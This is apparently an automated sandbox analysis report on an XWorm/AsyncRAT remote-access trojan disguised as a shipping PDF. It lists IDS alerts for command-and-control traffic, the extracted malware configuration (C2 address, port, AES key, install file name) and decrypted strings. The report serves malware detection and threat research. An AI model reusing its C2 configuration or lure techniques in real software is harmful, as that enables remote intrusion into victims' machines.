2024-10-08T11:30:58.005043+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:59.603334+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:00.620081+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:03.528338+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:20.623465+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:23.463295+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:34.406820+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:34.829517+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:35.952320+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:46.436477+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:53.895621+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:53.900759+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:55.120535+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:56.122579+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:57.992389+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:32:05.394984+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:32:14.924364+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:32:23.838122+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T11:28:55.319169+0200	2852874	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:25.309226+0200	2852874	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:55.307665+0200	2852874	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:25.497328+0200	2852874	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:55.308301+0200	2852874	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:26.710516+0200	2852874	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:57.245664+0200	2852874	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:25.332473+0200	2852874	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T11:30:39.540173+0200	2853193	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2087295289.0000000002A51000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["104.250.180.178"], "Port": "7061", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Multi AV Scanner detection for domain / URL

Source: 104.250.180.178

Virustotal: Detection: 15%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Roaming\XClient.exe	Virustotal: Detection: 28%			Perma Link

Multi AV Scanner detection for submitted file

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	ReversingLabs: Detection: 18%
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Virustotal: Detection: 28%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack	String decryptor: 104.250.180.178
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack	String decryptor: 7061
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack	String decryptor: <123456789>
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack	String decryptor: XWorm V5.2
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack	String decryptor: USB.exe
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack	String decryptor: %AppData%
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack	String decryptor: XClient.exe

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: SmhB.pdb source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, XClient.exe.3.dr
Source:	Binary string: SmhB.pdbSHA256 source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, XClient.exe.3.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49763 -> 104.250.180.178:7061
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.250.180.178:7061 -> 192.168.2.5:49763
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.250.180.178:7061 -> 192.168.2.5:49763
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49763 -> 104.250.180.178:7061
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49763 -> 104.250.180.178:7061

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 104.250.180.178

Source: global traffic

TCP traffic: 192.168.2.5:49763 -> 104.250.180.178:7061

Source: Joe Sandbox View

IP Address: 104.250.180.178 104.250.180.178

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178

Source: powershell.exe, 00000009.00000002.2230293062.0000000007739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000007.00000002.2183561020.00000000075C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.miE
Source: powershell.exe, 00000004.00000002.2145777627.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000007.00000002.2186717140.0000000008582000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000007.00000002.2164444713.000000000307B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microz
Source: powershell.exe, 00000004.00000002.2143073339.0000000005327000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2178946361.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2221393988.0000000005DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287415464.0000000005A97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.2267205471.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2138530136.0000000004416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2166129126.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2204031498.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2267205471.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000003.00000002.4534290807.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2138530136.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2166129126.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2204031498.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2267205471.0000000004A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2138530136.0000000004416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2166129126.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2204031498.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2267205471.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000C.00000002.2267205471.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.2138530136.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2166129126.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2204031498.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2267205471.0000000004A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000C.00000002.2287415464.0000000005A97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.2287415464.0000000005A97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.2287415464.0000000005A97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.2267205471.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.2204031498.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2204031498.000000000550F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2143073339.0000000005327000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2178946361.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2221393988.0000000005DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287415464.0000000005A97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2087295289.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.4530058708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2087295289.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2087295289.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_00ADF044	0_2_00ADF044
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_04F926E8	0_2_04F926E8
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_04F926D7	0_2_04F926D7
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_06B6BB48	0_2_06B6BB48
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_06B6F5E8	0_2_06B6F5E8
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_06B6F1B0	0_2_06B6F1B0
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_06B6ED78	0_2_06B6ED78
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_06B6ED68	0_2_06B6ED68
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_06B6BB38	0_2_06B6BB38
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_06B6E940	0_2_06B6E940
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_08963A50	0_2_08963A50
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_0896D3D4	0_2_0896D3D4
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_08961340	0_2_08961340
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_02DB6225	3_2_02DB6225
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_02DB4AC8	3_2_02DB4AC8
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_02DB3EC0	3_2_02DB3EC0
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_05E027B8	3_2_05E027B8
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_05E0C610	3_2_05E0C610
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_05E078F0	3_2_05E078F0
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_05E03088	3_2_05E03088
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_05E072D8	3_2_05E072D8
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_05E02470	3_2_05E02470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_028CB4A0	4_2_028CB4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_028CB490	4_2_028CB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04C8B4A0	9_2_04C8B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04C8B490	9_2_04C8B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08D93AA8	9_2_08D93AA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_0486B490	12_2_0486B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_08983A98	12_2_08983A98

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000000.00000002.2087295289.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000000.00000002.2087295289.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000000.00000002.2087295289.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000000.00000000.2075560196.0000000000580000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSmhB.exeL vs F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000000.00000002.2089473163.0000000006D80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000000.00000002.2087858423.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000003.00000002.4530058708.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000003.00000002.4545201691.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSmhB.exeL vs F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000003.00000002.4548061176.0000000005FF9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Binary or memory string: OriginalFilenameSmhB.exeL vs F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2087295289.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.4530058708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2087295289.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2087295289.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XClient.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, evBSdWeBEycC8.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, 3QiiXqkghrMk1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, 3QiiXqkghrMk1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, evBSdWeBEycC8.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, 3QiiXqkghrMk1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, 3QiiXqkghrMk1.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, gtv0gssvKWWRAOg38T65o.cs	Base64 encoded string: 'Y2m7z9x6jWcENPlNUeR5pyCUQgkINBomStoNpnlrWGD5k8Gdna37HW29JZ4or9rJpFPkm1RbMV6kU97GRxKdNyK7'
